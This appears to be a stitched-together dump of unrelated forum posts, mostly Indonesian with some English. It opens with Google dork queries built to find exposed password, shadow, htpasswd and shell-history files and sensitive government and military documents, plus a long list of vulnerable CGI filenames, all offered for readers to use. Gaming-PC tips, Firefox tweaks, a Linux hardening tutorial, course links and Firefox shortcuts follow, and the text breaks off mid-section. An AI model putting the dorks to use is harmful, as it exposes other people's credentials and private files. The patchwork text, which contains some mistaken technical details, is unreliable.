"Index of /mail" << seperti diatas
"Index of /" +passwd << mencari tulisan “Index of /” dimana didalamnya ada kata passwd
"Index of /" +password.txt
"Index of /" +.htaccess
index of ftp +.mdb allinurl:/cgi-bin/ +mailto


dan masih banyak lagi tergantung anda niat apa ngga ?



Sekarang model kata kunci lainnya :

Masukkan kata kunci inurl:"shop.mdb” ( mencari link dari suatu website yg menyertakan kata shop.mdb )



inurl:"shop.mdb" - Google Search (http://www.google.com/search?hl=en&lr=&ie=UTF-8&oe=UTF-8&q=inurl%3A%22shop.mdb%22)



akan menghasilkan 47 halaman yang membikin kita penasaran. Beberapa kata kuci yang bikin kita penasaran :



allintitle: "index of/admin"
allintitle: "index of/root"
allintitle: sensitive filetype:doc
allintitle: restricted filetype :mail
allintitle: restricted filetype:doc site:gov
inurl:passwd filetype:txt
inurl:admin filetype:db
inurl:iisadmin
inurl:"auth_user_file.txt"
inurl:"wwwroot/*."
top secret site:mil
confidential site:mil allinurl: winnt/system32/ (get cmd.exe)
allinurl:/bash_history

intitle:"Index of" .sh_history
intitle:"Index of" .bash_history
intitle:"index of" passwd
intitle:"index of" people.lst
intitle:"index of" pwd.db
intitle:"index of" etc/shadow
intitle:"index of" spwd
intitle:"index of" master.passwd
intitle:"index of" htpasswd
intitle:"index of" members OR accounts
intitle:"index of" user_carts OR user_cart


ALTERNATIVE INPUTS====================

_vti_inf.html
service.pwd
users.pwd
authors.pwd
administrators.pwd
shtml.dll
shtml.exe
fpcount.exe
default.asp
showcode.asp
sendmail.cfm
getFile.cfm
imagemap.exe
test.bat
msadcs.dll
htimage.exe
counter.exe
browser.inc
hello.bat
default.asp
dvwssr.dll
cart32.exe
add.exe
index.jsp
SessionServlet
shtml.dll
index.cfm
page.cfm
shtml.exe
web_store.cgi
shop.cgi
upload.asp
default.asp
pbserver.dll
phf
test-cgi
finger
Count.cgi
jj
php.cgi
php
nph-test-cgi
handler
webdist.cgi
webgais
websendmail
faxsurvey
htmlscript
perl.exe
wwwboard.pl
www-sql
view-source
campas
aglimpse
glimpse
man.sh
AT-admin.cgi
AT-generate.cgi
filemail.pl
maillist.pl
info2www
files.pl
bnbform.cgi
survey.cgi
classifieds.cgi
wrap
cgiwrap
edit.pl
perl
names.nsf
webgais
dumpenv.pl
test.cgi
submit.cgi
guestbook.cgi
guestbook.pl
cachemgr.cgi
responder.cgi
perlshop.cgi
query
w3-msql
plusmail
htsearch
infosrch.cgi
publisher
ultraboard.cgi
db.cgi
formmail.cgi
allmanage.pl
ssi
adpassword.txt
redirect.cgi
cvsweb.cgi
login.jsp
dbconnect.inc
admin
htgrep
wais.pl
amadmin.pl
subscribe.pl
news.cgi
auctionweaver.pl
.htpasswd
acid_main.php
access.log
log.htm
log.html
log.txt
logfile
logfile.htm
logfile.html
logfile.txt
logger.html
stat.htm
stats.htm
stats.html
stats.txt
webaccess.htm
wwwstats.html
source.asp
perl
mailto.cgi
YaBB.pl
mailform.pl
cached_feed.cgi
global.cgi
Search.pl
build.cgi
common.php
show
global.inc
ad.cgi
WSFTP.LOG
index.html~
index.php~
index.html.bak
index.php.bak
print.cgi
register.cgi
webdriver
bbs_forum.cgi
mysql.class
sendmail.inc
CrazyWWWBoard.cgi
search.pl
way-board.cgi
webpage.cgi
pwd.dat
adcycle
post-query
help.cgi



NB : ingat kemauan dan kreatif andalah yang akan dapat mendatangkan sesuatu yang menyenangkan


---=| E N D

Tips Buat Komnputer Game

Ini ada tips dikit tentang komputer buat game2 berat ^_^
kebanyakan orang kendala sesudah instal game, game ga bisa dimainin gara2 ga suport ama VGA nya (T_T)
jadi tips nya

1. VGA lo harus baru dan kuat ( Memnya >128MB, update driver, fasilitas lengkap)

jangan lopa liat soketnya AGP/PCI. kalo AGP ciri2nya dibagi 3 keping, PCI cuma 2 keping (yang satu kecil,yang satu panjang)

kalo VGA, gw saranin sih mereknya ATI Radeon (GECUBE) versi X500 ke atas
(sampai saat ini [07/oct/2006] X1900XTX paling top [tapi KANTONG BOLONG])
soalnya dari pengalaman, semua game yang gw beli jalan semua ^_^ (X1300)

kalo uang jadi kendala, lo bisa beli yang hypermemori, ga jauh beda, cuma ambil memorinya dari ram, jadi syaratnya kalo hyper, lo musti gedein ram juga (min 1GB)

tanpa VGA yang kuat, bye2 game2

2. Procesor harus cepat, untuk saat ini yang paling kuat intel core two Quardo EKSTRIM 3,0 GHZ, procesor ini beda dengan intel dual core/, ini generasi selanjutnnya ,"core two" ,kecepatannya jauh bgt

3. RAM (Random Acces Memori) harus min 1 GB dengan jenis PC- max (DDR=32,DDR2=4200)

gw jamin dengan 3 hal diatas, udah ngangkat kom lo jadi komputer game yang enak deh ^_^

spec kom gw (esensial aja):
-Intel Core two duo 1,8 GHZ
-Ram 1 Gb DDR2 PCI 4200
-VGA ATI Radeon GeCube X1300

dengan modal 7 jtan + skil tawar-menawar, lo dah dapetin tuh kom lengkap dgn monitor LCD ^_^

eh jgn lopa g minta reputasi gw yach....>:D< :x >:D<

Tips sederhana beli komputer

thankx to bro magician

1. tips nomor satu... JANGAN PERCAYA MERK. Ini teknologi, bukan parade merk.


2. Semua processor itu sama saja dalam segi stability, reliability, ketahanan, dll.
Asalkan dia bekerja dalam kondisi ideal. Dan kondisi ideal yang diminta processor
berbeda beda. Pastikan elo sanggup memberikan kondisi ideal dari processor yang dibeli.
Kayak colling extra untuk prescott, PSU lebih powerful untuk DFI, dsb.


3. Jangan terlalu terpaku pada sebuah komponen. Performance tertinggi sebuah komputer
hanya secepat komponen paling lambat dalam mata rantai proses komputer.
Pastikan elo kasih dia komponen yang cukup memadai untuk dia bekerja.
Terlalu tinggi mubazir, terlalu rendah juga bottleneck.


4. Cek review site yang bisa dipercaya. Sampai saat ini gue percaya sama Anandtech,
VR-Zone, dan kadang kadang gue ngecek ke forum XtremeSystems. Jangan site yang bias..
contoh site bias yang terkenal adalah Toms hardware.
Barang yang masuk ke Toms sudah bisa ditebak yang mana yang bagus.
Antara Intel, nVidia, atau ASUS. Ngga jauh jauh dari itu.
Demikian pula untuk informasi teknik, jangan gunakan webopedia.
Itu bikinan Intel, dan jelas sangat bias ke Intel.
Manfaatkan wikipedia yang lebih netral.

MAKE FIREFOX 100% n 10x FASTER

Here's how to speed up your firefox 10x faster

Cable Dsl
1. Type "about:config" into the address bar and hit enter. Scroll down and look for the following entries:

2. Alter the entries as follows:

Set "network.http.pipelining" to "true"
Set "network.http.proxy.pipelining" to "true"

set "network.http.pipelining.maxrequests" to some number like 30. This means it will make 30 requests at once.

3. Lastly right-click anywhere and select New-> Integer. Name it "nglayout.initialpaint.delay" and set its value to "0". This value is the amount of time the browser waits before it acts on information it recieves.


More options:

For ADSL:
1. Type: about:config
2. Set:
network.http.max-connections : 64
network.http.max-connections-per-server : 21
network.http.max-persistent-connections-per-server : 8
network.http.pipelining : true
network.http.pipelining.maxrequests : 100
network.http.proxy.pipelining : true

3. Lastly right-click anywhere and select New-> Integer. Name it "nglayout.initialpaint.delay" and set its value to "0". This value is the amount of time the browser waits before it acts on information it recieves. (Copy from TvM)

For Dial_ip:
browser.cache.disk_cache_ssl : true
browser.xul.error_pages.enabled : true
content.interrupt.parsing : true
content.max.tokenizing.time : 3000000
content.maxtextrun : 8191
content.notify.backoffcount : 5
content.notify.interval : 750000
content.notify.ontimer : true
content.switch.threshold : 750000
network.http.max-connections : 32
network.http.max-connections-per-server : 8
network.http.max-persistent-connections-per-proxy : 8
network.http.max-persistent-connections-per-server : 4
network.http.pipelining : true
network.http.pipelining.maxrequests : 8
network.http.proxy.pipelining : true
nglayout.initialpaint.delay : 750
plugin.expose_full_path : true
signed.applets.codebase_principal_support : true


Enjoy and browse faster!

Know Linux Secure

Methodology
Simplicity

The simplicity methodology seeks to increase security by reducing vulnerability. In the rest of this tutorial you will learn to:
1. Reduce network access to your machine using a firewall (we'll teach you how to build your own)
2. Decrease the number of priveleged programs. You help yourself by decreasing priveleged programs because you reduce the ways ppl can gain access
3. Tighten configuration of those priveleged programs you want to keep
4. Reduce number of paths to root, that is restrict access of non-priveleged users
5. Deploy intrusion detection by using file integrity checking

You will do yourself a big favor if you restrict access to and remove all unnecessary priveleged programs. However, many linux users are unaware of what the hell all those programs do that come prepackaged with their distro of choice. The linux services list will give a brief description of each service configured to install automatically on linux and a recommendation as to whether the service should be left on or not.

Firewalls
BASIC Firewalling with IPChains

There are a number of great tutorials and HOWTOs on IPChains available on the net. If you get confused by this tutorial I would recommend you look to the internet for clarification. Remember, DIY.

Linux Kernal 2.2 supports stateless packet filtering -- like a router.
Linux Kernal 2.4 supports stateful packet filtering -- like on a commercial firewall package.


TCP/IP Introduction/Reminder

TCP/IP is the basic internet protocol developed by a group of academics. This is an open source standard and is what makes the internet as we know it possible. Microsoft has tried to coopt this standard and has released standards that were intended to make TCP/IP obsolete. Luckily these efforts were a failure.

Every communication between two computers on the internet is broken into data packets. Each data packet begins with a header which tells servers and computers where to send the packet to. TCP/IP stands for Transport Control Protocol / Internet Protocol. The IP part gets information from one host to another. The header's important fields are: Source IP address and Destination IP address. or SRC_IP and DST_IP. TCP gets information from one program to another. Header's important fields are: Source Port and Destination Port. Another TCP - like protocol is UDP or User Datagram Protocol. I will not elaborate on the difference here. I would advise you to look to the internet for more information if you are interested.

TCP rides with the IP packet through encapsulation, this will all be important in understading your IPChains. The header for TCP is placed at the beginning of the data portion of the IP packet.

TCP is good at correcting errors, packet ordering, confirming packets, and creating and destroying connections. This last part is of particular interest. By understanding how a connection is made using TCP and what that consists of, you can regulate who may connect to your computer. All hack attacks begin with a connection. So sit up and pay attention! You should be aware that the one downside of TCP that UDP is actually superior for is that TCP has a high overhead, data flows at slower speeds.


Packet Filtering Intro

There are two major types of firewalls: Packet Filtering and Proxy
I recommend packet filtering which can be implemented using IPChains and IPTables (later in this tutorial). Packet filtering deletes packets trying to connect over a network based on a set of rules written by you. Proxy-based firewalls allow you to make a connections through an intermediary host, then that host connects for you, making a clean connection and protecting the entity behind the host. The major drawback of using a Proxy is a slower connection. Although these are sometimes useful as a user wanting to surf anonymously. Remember though, you are not totally anonymous because the host knows who you are and everyone else knows who the host is (identification occurs through your IP address). Check out Cyberarmy.com for a list of proxies. Wingates can also be useful for this type of anonymity. I will post a tutorial on wingates later.

When you make a connection, you send your packet to a host port from a port on your machine. Common services such as FTP and Web Servers listen on a predictable port. In fact, web browsers are programmed to automatically check port 80 for the webpage by default. You can check another port with a web browser by indicating it in the address. i.e. www.hackerthreads.org:2105, however, if there is nothing there or if there is a service running that doesn't understand a browser request, nothing will come of your attempt. Daemon is the name for the listener on a port. So there would be an FTP daemon listening on port 21. Anyway, in building your firewall, you want to restrict access to ports as that is where the connection requests go. A bunch of open ports = vulnerability.

Common ports and their service:
FTP -- 20/21
SSH -- 22
SMTP -- 25
DNS -- 53
HTTP -- 80
POP -- 110
IMAP -- 143
HTTPS -- 443
IRC -- 6667
Telnet -- 23

If you dont know what these services are, look them up, they are very common. You should not have any trouble finding plenty of documentation on them.


Lets Block Connections

So here is how you would block all incoming connection requests but let all connection requests go through:
TCP does what is called handshaking when a new connection is made. The first packet sent says: Source -> Synchronize or (SYN) = on and Acknowledge (ACK) = off
The second packet says Dest->Source: SYN=on, ACK=on
The third packet says Source-> Destination: SYN=off, ACK=on
The fourth packet says .... -> SYN=off, ACK=on

To block all incoming requests then, you need to set you firewall to reject or drop all packets that have SYN=on and ACK=off. Lets get into some practical IPChain writing.

There are there possible chains INPUT, FORWARD, OUTPUT (packets that are going to be forwarded go through all three in ipchains)
When there is an incoming connection request on a specfic port, your machine will test the request against its rule set to determine whether the connection is responded too, is completed, rejected or dropped.

Lets look at an INPUT Chain then go through each line of the chain:

Default Policy: Accept
src_port = 23 judgement=block
dst_port = 21 judgement=block

This chain has a default policy of accept. That means when a new connection comes in, if it is not covered by your rule set then the connection will be allowed. The opposite is true for a default policy: deny


This chain then says that any packet that has a header indicating a source port of 23 block or do not allow the connection to be made, effectively denying access to telnet. The next rule says that any packet with a destination port 21 is also blocked, effectively denying access to FTP (both good policies).

IPChain Syntax:
ipchain -P where ACTION = {allow, deny, reject, masquerade}
then set default policy of the chain

ipchains -F chain flushes or resets all chains.

ipchains -A chain appends a rule to the end of chain

ipchains -L chain lists all rules for chain

ipchains -A chain
-s (Source_IP)
-d (Destination_IP)
--source-port (Source_Port)
--destination-port (Destination_Port)
-i (network_interface)
! (expression) also =NOT (boolean logic)
-y = SYN (flag set) to block packets with SYN status = on or = off


Chain
INPUT,OUTPUT,FORWARD

Judgement
ACCEPT,DROP,REJECT,LOG,MASQUERADE --accept permits a connetion to be made, drop means the connection is dropped and no msg is sent to user, reject means the connection is dropped and a reject message is sent to the user, log means that the connection attempt will be logged with the person's IP, time and other goodies.

Syntax Example for blocking ftp and telnet:

{Default Policy: Accept
src_port = 23 judgement=block
dst_port=21 judgement=block}

would look like:
ipchains -P input allow --setting default policy
ipchains -F input --flushing ruleset
ipchains -A input -p tcp --sport 23 -j DENY --denying any TCP connection with source port 23, which is telnet
ipchains -A input -p tcp --dport 21 -j DENY --denying any TCP connection with destination port 21, which is where your ftp server is


Daemons
As a Linux system administrator I recommend that you perform regular Service/Daemon Audits. This takes time and you do lose some of that simplicity, but you will more than make up for time lost up front doing audits by avoiding the time it takes with a hacked machine, especially if you are on a network.

Why are Audits important?
In the Linux operating system, programs have priveleges. Some have root priveleges. They need this privelege in order to run their processes. Some services are persistent, while others are considered non-persistent. The difference is that a persistent program is always running or is running on some schedule whereas a non-persistent program runs once when it is called to, i.e. on boot, and then doesn't run again. Running persistent programs that you don't need is not only a security issue but also drains resources by cycling through its process, requiring electricity and system resources. Don't be tempted to think that non-persistent programs are not a threat, they are.

Step 1 in System Audit:


Wrappers
Inetd - it's the original network superserver. There is also now Xinetd that has become very popular. I will cover Inetd but these principles are applicable to Xinetd as well. By superserver I mean Inetd is in control of serving several processes or services, it is several daemons (port listeners) at once.


Inetd listed on many ports and starts a single instance of an appropriate server for each incoming connetion. Here is a list of some of the most well known services controlled by Inetd: ftp, telnet, pop, imap, finger

You can get a list of services at /etc/services, you can also access the status of your services, so you know what is running. People use /etc/inetd.conf to configure there inetd superserver.


An example of what you may see in inetd.conf

(port) (type) (proto) (wait) (UID) (Program) (Arguments)
telnet stream tcp nowait root /usr/sbin/tcpd in.telnetd

Here is an example of the RH6.2 inetd.conf file (I do not adovocate using RedHat or any other distribution):

ftp stream tcp nowait root /usr/sbin/tcpd in.ftpd -l -a
telnet stream tcp nowait root /usr/sbin/tcpd in.telnetd
shell stream tcp nowait root /usr/sbin/tcpd in.rshd
login stream tcp nowait root /usr/sbin/tcpd in.rlogind
talk dgram udp wait nobody.tty /usr/sbin/tcpd in.talkd
talk dgram udp wait nobody.tty /usr/sbin/tcpd in.ntalkd
finger stream tcp nowait nobody /usr/sbin/tcpd in.fingerd
linuxconf stream tcp wait root /bin/linuxconf linuxconf --http

note the services that have root as UID, those programs get root priveleges. Should an intruder gain control of that service you could be in trouble. That is why it is essential to audit services and determine whether a particular service is necessary.

Step 2 in System Audit: Onward to the SERVICES

It can sometimes be hard to find documentation on all those services. Why do so many come prepackaged? Because many linux distros are bending to market pressure for more features. Also, it decreases the cost to customer support since there are fewer newbies calling to ask how to turn service X on.

ftp
Generally bad news. Used for data transfer between to machines. Data is transfered in cleartext and that is really bad. FTP is difficult to firewall because ports 20 and 21 must be open and typically ftp servers open all kinds of extra ports for connection reasons as well. There are tons of security vulnerabilities in WU-FTPd, Pro-FTPd adn even on OpenBSD. I suggest replacing ftp with SSH. I will talk more about SSH later. The main advantage to ftp is that many ppl know how to use it and there are an abundance of clients. tftp can be helpful for other reasons, if you think you need it, you don't need me to explain it.

telnet
Generally bad news. Telnet is cleartext meaning the session and passwords can be gotten quite easily. These sessions can actually be hijacked using a program called Hunt. There are others like it as well such as Jaugarnaut. I would avoid this like the plague. SSH can replace this one too. This service is typically used as a way to get remote access to a machine.

rsh, rlogin, rcp, rexec
This service is also cleartext. It relies on IP addresses for authentication, which are spoofable. There is a lenghty vulnerability history.The R tools are pretty much out of use. They were built by Berkeley CS folks and were designed for a largely different network paradigm. The r-tools are not safe. They are all cleartext and they all have lengthy vulnerability histories. I would definetly turn these suckers off.

talk/ntalk
These can be useful, but you shouldn't discuss sensitive information using them. This is basically the original Instant Message client. Users on a network can send messages to each other instanteously. In the old days it was a great way to meet women in college, because we were all on the same network. You can just indicate a user and start talking. The dangerous part is that they are not encrypted and are hijackable. Thus I would not use them for sensitive information. The service themselves do not open your machine to vulnerabilities.

finger
Finger is a way to get information about users on a network. The command is simply finger or just finger. By default, finger lists the login name, full name, and the host and terminal name as well as the write status, idle time, login time and login location for each current user. Office and home phone numbers are optional and may be added to your finger if you wish that information to be public knowledge. Use chfn to change your finger information. By creating a .plan and/or a .project file in your home directory you can include your current or future schedule, research interests or any other pertinent information in the information displayed by finger. This is useful for others who may need to know your schedule in order to contact you. As you can see this is very useful but you should be aware that it can give arbitrary people too much information. If you are going to use this, limit it to queries on your local network!

anacron
Anacron is similar to cron, but it is actually better for machines on the network that are not always-on machines. This program allows other programs to run on a schedule designated by weekly or hourly instead of by a time in cron. It is responsible for peforming some great tasks like changing logs. I would leave this guy on.

kudzu
This detects new hardware and stops running before anyone logs in. It's not a risk and is important. Leave it on. This is an example of a non-persistent service.

ipchains
ipchains loads your kernel filtering rules if there are rules that have been set. This can't hurt you but you may as well turn the thing off if you haven't created a rule set. I recommend turning it off and using IPTables and TCP Wrappers.

network
Starts up network interfaces and stops, this is a very important function. This is another non-persistent service. Leave it on.

portmap
Provides RPC portmapping to NFS and NIS. If you are not using these, and I recommend you not, trun Portmap off. Portmap has had many security vulnerabilities. It has been quite a risk in the past, you should really try not to use any of the above mentioned services anyway. As they too are risky business.

nfslock
Starts rpc.lockd and rpc.statd, two services that are needed for NFS clients and servers. If you are not using NFS, which you shouldn't be imo, then for god's sake turn this off.

apmd
Acronym stands for Advanced Power Management Daemon. This is good for linux on a laptop. If you are not on a laptop, you don't need this. I don't know of any security problems but this is a persistent process which eats up system resources, just runs useless cycles, no real benefit if you are not on a laptop. There could be vulnerabilities on this in the future, which system admins should keep in mind. The key is to beat crackers before they get to your system.

random
It is a non-persistent script that maintains a random seed needed by the OS. Dont worry about it. FYI the random seed is used for encryption. You should also know that no seed created by an algorithm is ever truly random, though many a CS student believes otherwise.

netfs
Mounts network filesystems. This is a non-persistent service so not a very risky proposition. NFS has had quite a few problems over the years and so I discourage its use. If you dont run NFS then this is not necessary. If you insist on running NFS or Samba keep security in mind. I recommend doing your damnest to secure your intranet so that intruders can't get in in the first place. Though that is not always possible.

syslogd
Starts the syslog daemon which is important. It logs activity to your log files. I strongly recommend keeping this running. It will help you identify attacks in their early stages. These logs are the first you check when you think there has been an intruder or when you think you are under attack. Without syslogd those files don't get created. That would be bad.

identd
Learn it and love it. Permits the systems that your computer communicates with to make TCP connections to determine who has originated a connection. I use it mainly to check on local users. Can tell you which computer got cracked, can help track the person down, depending on the attack. I would type man identd at the command line if were you and didn't know this service.

atd
Allows users to schedule programs for later execution. This has a lengthy security history and has been replaced by cron or anacron. Turn it off.

crond
Allows users to schedule programs for later use. I use this primarily for repetitive execution. Shell scripting knowledge required. Configure this to only allow priveleged users to access and modify it. If you are not familiar with this run a man page on it. I think you will find it extremely useful. I wish I could cron everything in life Smile Of course, automation is the holy grail for me so....

pcmcia
This just loads pcmcia modules into the kernel if you have a pcmcia card, which you will only have if you are running a laptop. Turn this off if you are not on a laptop, not necessary. Again try to avoid those useless cycles.

inetd
xinetd/inetd control many internet daemons as discussed above. If none of its services are running and you chose not to use TCP wrappers, turn this off.

rawdevices
Allows your system to map and block devices. This is non-persistent and is not a security threat. This is safe and useful.

gpm
A cut and paste server for command line session. This has had some root vulnerabilities in the past. If you run X you won't need this. If you are all command line sessions, you may want to keep it. I use command line though generally turn it off by habit. It's really your call.

httpd
This is your Apache web server. So, in general, I have this on, but then again I am serving pages and experimenting with differnt mods. If you do not want to serve pages or are currently not serving pages but intend to in the future, turn it off until you do. Web servers can present some interesting problems.

xfs
This is only needed if your box is a font server. I turn this off.

linuxconf
This is used to make policy changes. I believe it is a Red Hat product. There is much debate in the linux community whether this is a good tool or not. Personally, I used it when I first got into linux but don't anymore. It's non-persistent and not much of a risk. If you don't use it turn it off.

local
This is safe. local stores your machine scripts and is what you make of it. I leave this on, but audit it periodically.


Root Audit
Every file in Unix and Linux have a set of permissions. File permissions are octal and are generally three numbers. The first designates the User owner -- or who owns the file, the second number designates Group owner -- what Group the file is owned by and the third is Global or the permissions for everyone else.

Each number that represents the file permissions is a combination of three binary numbers:
100 (4) - Read
010 (2) - Write
001 (1) - Execute

So a 7 would equal give Read, Write adn Execute permissions to that particular Owner, Group or Global. A way for short handing that is 7 = rwx

To follow this example further, 5 = rx or gives permissions to Read and Execute. That would allow the user with this permission set to view and use a file but would not allow them to change the file.

4 = r or just Read permissions
6 = rw or Read and Write permissions

A file that is a program and needs to be ran to be used, for example ./edonk , cannot be used unless the permissions are set to allow execution. I have spent an hour researching a non-functioning program only to check the permissions and notice that I did not invoke the execute permissions for the user, group or globally. This is very important when you first install a program. Some come with wide open permissions, which can be dangerous if the program gives away important system information or access. Other programs give no permissions at all and cannot be run until you set the permissions appropriately.

Here is an example of a full set of permissions:

755 - user can can rwx, the group can rx, global can rx

SUID
755 is really 0755. That first digit has to do with Set -UID or SUID. SUID/SGID progs have a non-zero first digit, such as:
4755 - SetUID or 2755 - SetGID.

Progs normally run as the user who started the prog in the first place. SUID progs run as the owner. If a SUID prog develops a bug or vulnerabilty it can be exploited to allow regular system users to acquire the priveleges of the prog owner, usually root. This is why it is a damn good idea to restrict Set-UID.

Two ways to restrict Set-UID:

1. Strip off SUID bit -- remove SUID bit thus removing the security context transformation (or the transfer of root priveleges to regular users).

Here is the syntax: chmod u-s foo or chmod 0755 foo (if you are confused by this syntax look up chmod command)

2. Strip World Execute -- remove teh world execute bit to allow only those with a special group to use the program.

Here is the syntax: chmod o-x foo or chmod 4750 foo

Now that you know all about Set-UID and how to eliminate the vulnerabilty, check your programs under root ownership to see whether they have SUID permissions. If so, make sure you have a really good reason for granting those priveleges.

PS : dont give me any Credit, this is just an old file from my hdd

Secret

Web Applications

Video Lectures at ArsDigita University (http://students.odl.qmul.ac.uk/aduni/index.php/07_web_applications)
Mirror ar ArsDigita (http://www.aduni.org/courses/web/index.php?view=cw)
High Speed Mirror at Internet Archive (http://www.archive.org/details/arsdigita_07_web_applications)
Course website (http://www.aduni.org/courses/web/)
Teaches basics of designing a dynamic web site with a database back end, including scripting languages, cookies, SQL, and HTML with the goal of building such a site as the main (group) project Emphasizes computer-human interface and the graphical display of information.

Structure and Interpretation of Computer Programs

Video lectures at MIT (http://www.swiss.ai.mit.edu/classes/6.001/abelson-sussman-lectures/)
Structure and Interpretation of Computer Programs has been MIT's introductory pre-professional computer science subject since 1981. It emphasizes the role of computer languages as vehicles for expressing knowledge and it presents basic principles of abstraction and modularity, together with essential techniques for designing and implementing computer languages. This course has had a worldwide impact on computer science curricula over the past two decades.

Structure and Interpretation of Computer Programs(a different course)

Video lectures at ArsDigita University (http://students.odl.qmul.ac.uk/aduni/index.php/01_sicp)
Mirror at ArsDigita (http://www.aduni.org/courses/sicp/index.php?view=cw)
High Speed Mirror at Internet Archive (http://www.archive.org/details/arsdigita_01_sicp)
Course website (http://www.aduni.org/courses/sicp/)
An introduction to programming and the power of abstraction, using Abelson and Sussman's classic textbook of the same name. Key concepts include: building abstractions, computational processes, higher-order procedures, compound data, data abstractions, controlling interactions, generic operations, self-describing data, message passing, streams and infinite data structures, meta-linguistic abstraction, interpretation of programming languages, machine model, compilation, and embedded languages.

Structure and Interpretation of Computer Programs(a different course)

Video Lectures:CS61A (http://webcast.berkeley.edu/courses/archive.php?seriesid=1906978270)(Berkeley)
Course website (http://www-inst.eecs.berkeley.edu/%7Ecs61a/sp06/)
The CS 61 series is an introduction to computer science, with particular emphasis on software and on machines from a programmer's point of view. This first course concentrates mostly on the idea of abstraction, allowing the programmer to think in terms appropriate to the problem rather than in low-level operations dictated by the computer hardware. The next course, CS 61B, will deal with the more advanced engineering aspects of software on constructing and analyzing large programs and on techniques for handling computationally expensive programs. Finally, CS 61C concentrates on machines and how they carry out the programs you write.
In CS 61A, we are interested in teaching you about programming, not about any particular programming language. We consider a series of techniques for controlling program complexity, such as functional programming, data abstraction, object-oriented programming, and query systems. To get past generalities you must have programming practice in some particular language, and in this course we use Scheme, a dialect of Lisp. This language is particularly well-suited to the organizing ideas we want to teach. Our hope, however, is that once you have learned the essence of programming, you will find that picking up a new programming language is but a few days' work.


Data Structures

Video Lectures:CS61B (http://webcast.berkeley.edu/courses/archive.php?seriesid=1906978271)(Berkeley)
Course website (http://www-inst.eecs.berkeley.edu/%7Ecs61b/sp06/)
The CS 61 series is an introduction to computer science, with particular emphasis on software and on machines from a programmer’s point of view. CS 61A covered high-level approaches to problem-solving, providing you with a variety of ways to organize solutions to programming problems: as compositions of functions, collections of objects, or sets of rules. In CS 61B, we move to a somewhat more detailed (and to some extent, more basic) level of programming. As in 61A, the correctness of a program is important. In CS 61B, we’re concerned also with engineering. An engineer, it is said, is someone who can do for a dime what any fool can do for a dollar. Much of 61B will be concerned with the tradeoffs in time and memory for a variety of methods for structuring data. We’ll also be concerned with the engineering knowledge and skills needed to build and maintain moderately large programs.

Machine Structures
Video Lectures:CS61C (http://webcast.berkeley.edu/courses/archive.php?seriesid=1906978272)(Berkeley)
Course webpage (http://www-inst.eecs.berkeley.edu/%7Ecs61c/current/)
The subjects covered in this course include C and assembly language programming, how higher level programs are translated into machine language, the general structure of computers, interrupts, caches, address translation, CPU design, and related topics. The only prerequisite is that you have taken Computer Science 61B, or at least have solid experience with a C-related programming language.

Programming Languages
Video Lectures:CSEP505 (http://www.cs.washington.edu/education/courses/csep505/06sp/lectures/)(University of Washington)
Course website (http://www.cs.washington.edu/education/courses/csep505/06sp/)
Goals: Successful course participants will:
• Master universal programming-language concepts (including datatypes, functions, continuations, threads,
macros, types, objects, and classes) such that they can recognize them in strange guises.
• Learn to evaluate the power, elegance, and definition of programming languages and their constructs
• Attain reasonable proficiency programming in a functional style
• Find relevant literature somewhat more approachable.

Principles of Software Engineering

Video Lectures:CS584 (http://www.cs.washington.edu/education/courses/584/01wi/lectures/)(University of Washington)
Course website (http://www.cs.washington.edu/education/courses/584/01wi/)
Study of major developments in software engineering over the past three decades. Topics may include design (information hiding, layering, open implementations), requirements specification (informal and formal approaches), quality assurance (testing, verification and analysis, inspections), reverse and re-engineering (tools, models, approaches).

Object Oriented Program Design

Video lectures at ArsDigita University (http://students.odl.qmul.ac.uk/aduni/index.php/04_java)
Mirror at ArsDigita (http://www.aduni.org/courses/java/index.php?view=cw)
High Speed Mirror at Internet Archive (http://www.archive.org/details/arsdigita_04_java)
Course website (http://www.aduni.org/courses/java/)
The concepts of the Object-oriented paradigm using Java. The basic principles of software engineering are emphasized. We study how to design and think in an object oriented fashion.

Algorithms

Video lectures at ArsDigita University (http://students.odl.qmul.ac.uk/aduni/index.php/05_algorithms)
Mirror at ArsDigita (http://www.aduni.org/courses/algorithms/index.php?view=cw)
High Speed Mirror at Internet Archive (http://www.archive.org/details/arsdigita_05_algorithms)
Course website (http://www.aduni.org/courses/algorithms/)
The design and analysis of algorithms is studied. Methodologies include: divide and conquer, dynamic programming, and greedy strategies. Their applications involve: sorting, ordering and searching, graph algorithms, geometric algorithms, mathematical (number theory, algebra and linear algebra) algorithms, and string matching algorithms.

We study algorithm analysis - worst case, average case, and amortized, with an emphasis on the close connection between the time complexity of an algorithm and the underlying data structures. We study NP-Completeness and methods of coping with intractability. Techniques such as approximation and probabilistic algorithms are studied for handling the NP-Complete problems.

Mengupas Tuntas Firefox

Kalo kamu menggunakan FireFox, mungkin kamu ga tau kalo firefox punya banyak rahasia. Dan shortcut-shortcut dan rahasia-rahasia lain yang dapat memudahkan kita dalam berselancar. Disini saya akan memaparkan secara lengkap isi dari firefox itu


Kalo kamu menggunakan FireFox, mungkin kamu ga tau kalo firefox punya banyak rahasia. Dan shortcut-shortcut dan rahasia-rahasia lain yang dapat memudahkan kita dalam berselancar. Disini saya akan memaparkan secara lengkap isi dari firefox itu


Kalo kamu menggunakan FireFox, mungkin kamu ga tau kalo firefox punya banyak rahasia. Dan shortcut-shortcut dan rahasia-rahasia lain yang dapat memudahkan kita dalam berselancar. Disini saya akan memaparkan secara lengkap isi dari firefox itu


SHORTCUT DASAR

Add Bookmarks : Ctrl + D
Bookmarks : Ctrl + B
DOM Inspector : Ctrl + Shift + I
Downloads : Ctrl + J
Tampilan Full Screen : F11
Help : F1
History : Ctrl + H
Page Source : Ctrl + U
Print : Ctrl + P
Refresh Halaman : F5
Refresh Halaman & Cache : Ctrl + F5
Simpan Halaman Situs : Ctrl + S

SHORTCUT NAVIGASI

Back : Alt + Left Arrow
Down One Line : Down
Down One Page : PageDown
File Open : Ctrl + O
Forward : Alt + Right Arrow
Frame Next : F6
Frame Previous : Shift + F6
Home Page : Alt + Home
Jump to Address Bar : Ctrl + L
Jump to Search Bar : Ctrl + K
Page Bottom : End
Page Top : Home
Stop : Esc
Tab Close : Ctrl + W
Tab New : Ctrl + T
Tab Next : Ctrl + Tab
Tab Previous : Ctrl + Shift + Tab
Tab Select : Ctrl + [1 - 9]
Up One Line : Up
Up One Page : PageUp
Window Close : Alt + F4
Window New : Ctrl + N

SHORTCUT TEXT

Copy : Ctrl + C
Cut : Ctrl + X
Delete : Del
Memperbesar ukuran teks : Ctrl + -
Memperkecil ukuran teks : Ctrl + +
Mengembalikan teks ke default : Ctrl + 0
Undo : Ctrl + Z

SHORTCUT UNTUK PENCARIAN/ SEARCH

